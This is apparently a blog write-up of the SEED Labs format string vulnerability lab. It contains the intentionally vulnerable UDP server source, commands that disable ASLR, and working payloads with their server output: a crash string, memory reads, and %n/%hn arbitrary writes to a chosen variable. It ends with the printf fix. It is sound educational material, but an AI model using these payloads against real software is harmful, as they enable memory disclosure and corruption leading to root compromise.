
SEEDLAB Chap 6: Format String Vulnerability Lab

category SEEDLAB 2021. 1. 28. 22:59

This series covers the system security material from the book "Computer & Internet Security: A Hands-on Approach".

 

This post works through the lab exercises for Chapter 6, "Format String Vulnerability".

 

Only the more meaningful tasks among those provided by SEEDLAB are solved here.

 

Disable the mitigations

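Before starting the tasks, disable user-space address space layout randomization (ASLR), a mitigation that is enabled by default on recent Ubuntu releases.

Disabling ASLR is not strictly required to exploit a format string vulnerability, but it keeps the addresses the same from run to run, which makes the experiments easier.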

 

$ sudo sysctl -w kernel.randomize_va_space=0

 

Task 1: The Vulnerable Program

 

You are given a vulnerable program that has a format string vulnerability. This program is a server program. When it runs, it listens to UDP port 9090. Whenever a UDP packet comes to this port, the program gets the data and invokes myprintf() to print out the data. The server is a root daemon, i.e., it runs with the root privilege. Inside the myprintf() function, there is a format string vulnerability. We will exploit this vulnerability to gain the root privilege.



  1 #include <stdio.h>
  2 #include <stdlib.h>
  3 #include <unistd.h>
  4 #include <string.h>
  5 #include <sys/socket.h>
  6 #include <netinet/ip.h>
  7 
  8 #define PORT 9090
  9 
 10 /* Changing this size will change the layout of the stack.
 11  * We have added 2 dummy arrays: in main() and myprintf().
 12  * Instructors can change this value each year, so students 
 13  * won't be able to use the solutions from the past.   
 14  * Suggested value: between 0 and 300  */
 15 #ifndef DUMMY_SIZE
 16 #define DUMMY_SIZE 100
 17 #endif
 18 
 19 char *secret = "A secret message\n";
 20 unsigned int  target = 0x11223344;
 21 
 22 void myprintf(char *msg)
 23 {
 24     uintptr_t framep;
 25     // Copy the ebp value into framep, and print it out
 26     asm("movl %%ebp, %0" : "=r"(framep));
 27     printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);
 28 
 29     /* Change the size of the dummy array to randomize the parameters 
 30        for this lab. Need to use the array at least once */
 31     char dummy[DUMMY_SIZE];  memset(dummy, 0, DUMMY_SIZE);
 32 
 33     // This line has a format-string vulnerability
 34     printf(msg);
 35     printf("The value of the 'target' variable (after): 0x%.8x\n", target);
 36 }
 37 
 38 /* This function provides some helpful information. It is meant to
 39  *   simplify the lab tasks. In practice, attackers need to figure
 40  *   out the information by themselves. */
 41 void helper()
 42 {
 43     printf("The address of the secret: 0x%.8x\n", (unsigned) secret);
 44     printf("The address of the 'target' variable: 0x%.8x\n",
 45             (unsigned) &target);
 46     printf("The value of the 'target' variable (before): 0x%.8x\n", target);
 47 }
 48 
 49 void main()
 50 {
 51     struct sockaddr_in server;
 52     struct sockaddr_in client;
 53     int clientLen;
 54     char buf[1500];
 55 
 56     /* Change the size of the dummy array to randomize the parameters 
 57        for this lab. Need to use the array at least once */
 58     char dummy[DUMMY_SIZE];  memset(dummy, 0, DUMMY_SIZE);
 59 
 60     printf("The address of the input array: 0x%.8x\n", (unsigned) buf);
 61 
 62     helper();
 63 
 64     int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 65     memset((char *) &server, 0, sizeof(server));
 66     server.sin_family = AF_INET;
 67     server.sin_addr.s_addr = htonl(INADDR_ANY);
 68     server.sin_port = htons(PORT);
 69 
 70     if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0)
 71         perror("ERROR on binding");
 72 
 73     while (1) {
 74         bzero(buf, 1500);
 75         recvfrom(sock, buf, 1500-1, 0,
 76                  (struct sockaddr *) &client, &clientLen);
 77         myprintf(buf);
 78     }
 79     close(sock);
 80 }

 

The code is explained below.

Lines 51-52: struct sockaddr_in holds an IPv4 socket address (address family, port, and IP address).

Lines 53-54: Declare the variables used later by recvfrom().

Line 58: Declares the dummy array and sets every element to 0.

Line 60: Prints the address of the buf array.

Lines 62, 41-47: Call helper(), which prints the address of the string that secret points to, plus the address and value of the target variable.

Line 64: Creates a socket with AF_INET (IPv4), SOCK_DGRAM (datagram, i.e. UDP), and IPPROTO_UDP. socket() returns a socket descriptor.

Line 65: Zeroes out server, a sockaddr_in structure.

Lines 66-68: Set the server's address family, IP address, and port. INADDR_ANY binds the socket to all of the host's local addresses instead of one specific address. htonl() stands for "host to network long" and converts a 32-bit value from host byte order to network byte order (big-endian). htons() stands for "host to network short" and does the same for a 16-bit value.
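The byte-order conversion on lines 67-68 can be illustrated with a small Python 3 sketch. It uses struct.pack rather than the C functions themselves, so it only shows the byte layout that htons() and htonl() are expected to produce; the variable names are chosen here for illustration.

```python
import struct

PORT = 9090          # same value as the PORT macro in server.c
INADDR_ANY = 0       # numeric value of INADDR_ANY (0.0.0.0)

# "!" selects network byte order (big-endian), the layout that
# htons()/htonl() produce in memory.
port_network = struct.pack("!H", PORT)
addr_network = struct.pack("!I", INADDR_ANY)

# "<" selects little-endian, the host byte order on x86.
port_host = struct.pack("<H", PORT)

print(port_network.hex())  # 2382
print(port_host.hex())     # 8223
print(addr_network.hex())  # 00000000
```

9090 is 0x2382, so the network-order bytes are 0x23 0x82, while an x86 host stores the same value as 0x82 0x23.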

 

 

struct sockaddr_in {
        short   sin_family;
        u_short sin_port;
        struct  in_addr sin_addr;
        char    sin_zero[8];
};

 

Lines 70-71: bind() associates the socket with the address information stored in server.

Lines 73-78: bzero() clears buf. recvfrom() reads up to 1499 bytes of data arriving on the socket into buf, and then myprintf() is called on it.

 

 

Compilation. Compile the above program. You will receive a warning message. This warning message is a countermeasure implemented by the gcc compiler against format string vulnerabilities. We can ignore this warning message for now.

 

$ gcc -z execstack -o server server.c 
server.c: In function ‘myprintf’:
server.c:34:5: warning: format not a string literal and no format arguments [-Wformat-security]
     printf(msg);
     ^

It should be noted that the program needs to be compiled using the "-z execstack" option, which allows the stack to be executable. This option has no impact on Tasks 1 to 5, but for Tasks 6 and 7, it is important. In these two tasks, we need to inject malicious code into this server program’s stack space; if the stack is not executable, Tasks 6 and 7 will fail. Non-executable stack is a countermeasure against stack-based code injection attacks, but it can be defeated using the return-to-libc technique. To simplify this lab, we simply disable this defeat-able countermeasure.

 

Running and testing the server. The ideal setup for this lab is to run the server on one VM, and then launch the attack from another VM. However, it is acceptable if students use one VM for this lab. On the server VM, we run our server program using the root privilege. We assume that this program is a privileged root daemon. The server listens to port 9090. On the client VM, we can send data to the server using the nc command, where the flag "-u" means UDP (the server program is a UDP server). The IP address in the following example should be replaced by the actual IP address of the server VM, or 127.0.0.1 if the client and server run on the same VM.

 

// On the server VM
$ sudo ./server

// On the client VM: send a "hello" message to the server
$ echo hello | nc -u 127.0.0.1 9090

// On the client VM: send the content of badfile to the server
$ nc -u 127.0.0.1 9090 < badfile
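As an alternative to nc, the same datagram can be sent from a short Python 3 script. This is a minimal sketch, not part of the lab material: the helper name send_udp is made up here, and the default host and port simply mirror the nc commands above.

```python
import socket


def send_udp(payload, host="127.0.0.1", port=9090):
    """Send one UDP datagram, roughly what `nc -u host port < badfile` does.

    Returns the number of bytes handed to the kernel.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        return sock.sendto(payload, (host, port))
```

For example, send_udp(b"hello\n") corresponds to the echo hello command, and send_udp(open("badfile", "rb").read()) corresponds to sending badfile. Unlike nc, the script exits as soon as the datagram is sent.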

You can send any data to the server. The server program is supposed to print out whatever is sent by you. However, a format string vulnerability exists in the server program’s myprintf() function, which allows us to get the server program to do more than what it is supposed to do, including giving us root access to the server machine. In the rest of this lab, we are going to exploit this vulnerability.

 

The output is as follows.

 

// server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
hello

Task 2: Understanding the Layout of the Stack

 

To succeed in this lab, it is essential to understand the stack layout when the printf() function is invoked inside myprintf(). Figure 1 depicts the stack layout. You need to conduct some investigation and calculation. We intentionally print out some information in the server code to help simplify the investigation. Based on the investigation, students should answer the following questions:

 

• Question 1: What are the memory addresses at the locations marked by 1, 2, and 3?
• Question 2: What is the distance between the locations marked by 1 and 3?

 

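To find the address marked 1, i.e., the address of the format string, use a series of %x specifiers to locate the start of the buffer.

On the client, badfile is filled with the marker @@@@ followed by a run of %.8x specifiers and sent to the server as a UDP packet with nc.

The server interprets the string sent by the client as a format string and prints the words on its stack in hexadecimal.

The '@' character is 0x40 in ASCII, and the marker occupies the first 4 bytes of buf. Probing the stack with repeated %.8x specifiers showed that 79 of them are needed to reach buf, so the 80th prints 40404040.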
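The probing step can be sketched in Python 3 as follows. This is a hedged illustration rather than the exact file used in the post: build_probe and find_marker_index are hypothetical helpers, and leaked_hex stands for the run of 8-digit hex words copied by hand from the server's terminal (the text printed after the @@@@ marker).

```python
def build_probe(marker=b"@@@@", count=80):
    """Marker followed by `count` %.8x specifiers, to be written to badfile."""
    return marker + b"%.8x" * count


def find_marker_index(leaked_hex, marker=b"@@@@"):
    """Return the 1-based index of the %.8x that printed the marker.

    Each %.8x prints one 32-bit word as 8 hex digits. On a little-endian
    machine the marker bytes appear reversed inside that word.
    """
    words = [leaked_hex[i:i + 8] for i in range(0, len(leaked_hex), 8)]
    needle = marker[::-1].hex()
    return words.index(needle) + 1
```

With the stack layout shown in this post, the index would come out as 80, which is the value used in the %80$ specifiers of the later tasks. A different DUMMY_SIZE or compiler would likely give a different index.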

 

Task 3: Crash the Program

The objective of this task is to provide an input to the server, such that when the server program tries to print out the user input in the myprintf() function, it will crash.

 

client $ echo %s%s%s%s%s%s%s | nc -u 127.0.0.1 9090
server $
Segmentation fault

 

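In other words, each %s treats the value that va_list currently points to as the address of a string and reads from it until it meets a NUL byte, so a segmentation fault occurs as soon as one of those values is an inaccessible address.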

 

 

Task 4: Print out the Server Program's Memory

 

The objective of this task is to get the server to print out some data from its memory. The data will be printed out on the server side, so the attacker cannot see it. Therefore, this is not a meaningful attack, but the technique used in this task will be essential for the subsequent tasks.

 

• Task 4.A: Stack Data. The goal is to print out the data on the stack (any data is fine). How many
format specifiers do you need to provide so you can get the server program to print out the first four
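bytes of your input via a %x?

-> As found in Task 2, 79 %x specifiers are needed to reach the input, so the 80th one prints its first four bytes.

%80$8x accesses the 80th argument of the va_list directly and prints it in a field 8 characters wide.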

// server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
@@@@40404040
The value of the 'target' variable (after): 0x11223344

// client
$ python -c 'print "@@@@%80$8x"' > badfile
$ nc -u 127.0.0.1 9090  < badfile


• Task 4.B: Heap Data. There is a secret message stored in the heap area, and you know its address;
your job is to print out the content of the secret message. To achieve this goal, you need to place
the address (in the binary form) of the secret message in your input (i.e., the format string), but it is
difficult to type the binary data inside a terminal. We can use the following commands to do that.

-> As in Task 4.A, the shortened %k$s form keeps the payload short.

It is enough to write the address of the secret string (0x08048870) in little-endian order at the start of the input, as follows.

//server
[02/02/21]seed@VM:~/.../format_string$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
p�A secret message

The value of the 'target' variable (after): 0x11223344

// client
$ python -c 'print "\x70\x88\x04\x08%80$s"' > badfile 
$ nc -u 127.0.0.1 9090  < badfile

 

The following form also works, but since the offset of buf[1500] is already known, the %k$[format specifier] form is much easier.

$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x | nc -u 10.0.2.5 9090

// Or we can save the data in a file
$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x > badfile
$ nc -u 10.0.2.5 9090 < badfile

 

It should be noted that most computers are little-endian machines, so to store an address 0xAABBCCDD (four bytes on a 32-bit machine) in memory, the least significant byte 0xDD is stored in the lower address, while the most significant byte 0xAA is stored in the higher address. Therefore, when we store the address in a buffer, we need to save it using this order: 0xDD, 0xCC, 0xBB, and then 0xAA.
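The little-endian rule can be checked with a short Python 3 sketch that builds the Task 4.B payload. The helper name build_read_payload is made up for illustration; the address 0x08048870 and the argument index 80 are the values observed on the author's VM and would differ on another setup.

```python
import struct


def build_read_payload(addr, arg_index):
    """Little-endian address followed by a positional %s.

    "<I" packs a 32-bit unsigned integer with the least significant
    byte first, matching how the x86 server reads it back.
    """
    return struct.pack("<I", addr) + "%{}$s".format(arg_index).encode("ascii")


payload = build_read_payload(0x08048870, 80)
print(payload)  # b'p\x88\x04\x08%80$s'
```

Writing payload to badfile in binary mode gives the same bytes as the python -c command shown for Task 4.B, apart from the trailing newline that print adds.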

 

Task 5: Change the Server Program's Memory

 

The objective of this task is to modify the value of the target variable that is defined in the server program. Its original value is 0x11223344. Assume that this variable holds an important value, which can affect the control flow of the program. If remote attackers can change its value, they can change the behavior of this program. We have three sub-tasks.

 

• Task 5.A: Change the value to a different value. In this sub-task, we need to change the content of the target variable to something else. Your task is considered as a success if you can change it to a different value, regardless of what value it may be.

 

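Here the value of target is changed to 0x123. The 4 address bytes plus the 287 characters printed by %.287x make 4 + 287 = 291 = 0x123 characters printed before %80$n, and that count is what %n stores in target.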

// Server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
D�00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
The value of the 'target' variable (after): 0x00000123

// client
$ python -c 'print  "\x44\xa0\x04\x08%.287x%80$n"' > badfile 
$ nc -u 127.0.0.1 9090  < badfile

 

• Task 5.B: Change the value to 0x500. In this sub task, we need to change the content of the target variable to a specific value 0x500. Your task is considered as a success only if the variable’s value becomes 0x500.

 

// Server

$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
D�0000000000000000000000000000 ... (more zeros) ... 0000000000000000000000000
The value of the 'target' variable (after): 0x00000500

// Client
$ python -c 'print  "\x44\xa0\x04\x08%.1276x%80$n"' > badfile 
$ nc -u 127.0.0.1 9090  < badfile
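The precision values 287 and 1276 follow from the same rule: %n stores the number of characters printed so far, and 4 of them are the address bytes. A minimal Python 3 sketch of that arithmetic is given below; build_write_payload is a hypothetical helper, and the address and argument index are the ones observed in this post.

```python
import struct


def build_write_payload(addr, value, arg_index):
    """Build <addr>%.<N>x%<k>$n so that %n stores `value` at `addr`."""
    prefix = struct.pack("<I", addr)       # 4 bytes are printed first
    precision = value - len(prefix)        # characters %.Nx must add
    if precision < 8:
        # A 32-bit value can need up to 8 hex digits, so a smaller
        # precision would not guarantee an exact character count.
        raise ValueError("value too small for this simple scheme")
    fmt = "%.{}x%{}$n".format(precision, arg_index)
    return prefix + fmt.encode("ascii")


print(build_write_payload(0x0804a044, 0x123, 80))
print(build_write_payload(0x0804a044, 0x500, 80))
```

The ValueError branch also hints at why very small values are awkward to write with %n: the address bytes at the front of the payload have already been counted.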

• Task 5.C: Change the value to 0xFF990000. This sub-task is similar to the previous one, except that the target value is now a large number. In a format string attack, this value is the total number of characters that are printed out by the printf() function; printing out this large number of characters may take hours. You need to use a faster approach. The basic idea is to use %hn, instead of %n, so we can modify a two-byte memory space, instead of four bytes. Printing out 2^16 characters does not take much time. We can break the memory space of the target variable into two blocks of memory, each having two bytes. We just need to set one block to 0xFF99 and set the other one to 0x0000. This means that in your attack, you need to provide two addresses in the format string.

In format string attacks, changing the content of a memory space to a very small value is quite challenging (please explain why in the report); 0x00 is an extreme case. To achieve this goal, we need to use an overflow technique. The basic idea is that when we make a number larger than what the storage allows, only the lower part of the number will be stored (basically, there is an integer overflow). For example, if the number 2^16 + 5 is stored in a 16-bit memory space, only 5 will be stored. Therefore, to get to zero, we just need to get the number to 2^16 = 65,536.

 

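First, split the value into two parts: 0xFF99 for the upper two bytes and 0x10000 for the lower two bytes, which wraps around to 0x0000 when stored with %hn.

Because the machine is little-endian, the upper two bytes live at 0x0804a046 and the lower two bytes at 0x0804a044. 0xFF99 is written to 0x0804a046 first, and then 103 more characters are printed to bring the count up to 0x10000 for 0x0804a044. The 0x8 below accounts for the two 4-byte addresses at the start of the payload.

0xFF99 - 0x8 = 0xFF91 = 65425 (0x0804a046)

0x10000 - 0xFF91 - 0x8 = 0x67 = 103 (0x0804a044)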

 

// Server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
D�0000000000000000000000000000 ... (more zeros) ... 0000000000000000000000000
The value of the 'target' variable (after): 0xff990000

// client
$ python -c 'print "\x46\xa0\x04\x08\x44\xa0\x04\x08%65425x%80$hn%103x%81$hn"' > badfile
$ nc -u 127.0.0.1 9090  < badfile
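The two padding values can be derived mechanically. The Python 3 sketch below mirrors the payload above (upper half first, then the lower half, mixing plain %Nx with positional %k$hn as the post does); build_hn_payload is a hypothetical helper and the arithmetic is modulo 2^16 because %hn stores only the low 16 bits of the character count.

```python
import struct


def build_hn_payload(addr, value, arg_index):
    """Write a 32-bit `value` to `addr` as two 16-bit halves via %hn."""
    high = (value >> 16) & 0xFFFF
    low = value & 0xFFFF
    # Upper half lives at addr + 2 on a little-endian machine.
    payload = struct.pack("<I", addr + 2) + struct.pack("<I", addr)
    printed = len(payload)                 # 8 address bytes so far
    fmt = ""
    for offset, half in enumerate((high, low)):
        pad = (half - printed) % 0x10000   # characters still missing
        if pad < 8:
            pad += 0x10000                 # keep the field width exact
        fmt += "%{}x%{}$hn".format(pad, arg_index + offset)
        printed += pad
    return payload + fmt.encode("ascii")


print(build_hn_payload(0x0804a044, 0xFF990000, 80))
```

For 0xFF990000 this yields the widths 65425 and 103 used above. Other target values may be cheaper to write in a different order, which this sketch does not attempt to optimize.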

 

 

Task 8: Fixing the Problem

 

Remember the warning message generated by the gcc compiler? Please explain what it means. Please fix the vulnerability in the server program, and recompile it. Does the compiler warning go away? Do your attacks still work? You only need to try one of your attacks to see whether it still works or not.

 

Compiling the current server.c produces the following warning.

 

$ !gcc
gcc -z execstack -o server server.c
server.c: In function ‘myprintf’:
server.c:34:5: warning: format not a string literal and no format arguments [-Wformat-security]
     printf(msg);
     ^

 

 

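The warning says that the format argument passed to printf() is not a string literal and that no format arguments follow it, which means externally supplied data may be interpreted as format specifiers. The code can therefore be hardened as follows.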

 

// secure_server.c

 22 void myprintf(char *msg)
 23 {
 24     uintptr_t framep;
 25     // Copy the ebp value into framep, and print it out
 26     asm("movl %%ebp, %0" : "=r"(framep));
 27     printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);
 28 
 29     /* Change the size of the dummy array to randomize the parameters 
 30        for this lab. Need to use the array at least once */
 31     char dummy[DUMMY_SIZE];  memset(dummy, 0, DUMMY_SIZE);
 32 
 33     // This line has a format-string vulnerability
 34     // printf(msg);
 35     printf("%s", msg);
 36     printf("The value of the 'target' variable (after): 0x%.8x\n", target);
 37 }

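Replacing line 34 with line 35 makes printf() treat the user's input purely as data, so any format specifiers it contains are printed literally instead of being interpreted.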

 

The result is as follows.

 

$ ./secure_server 
The address of the input array: 0xbfffe660
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5b8
hello
The value of the 'target' variable (after): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5b8
F�D�%65425x%80$hn%103x%81$hn
The value of the 'target' variable (after): 0x11223344
^C

 

Defending against format string vulnerabilities takes care on the developer's side, warnings from the compiler, and mitigations such as ASLR and the NX bit.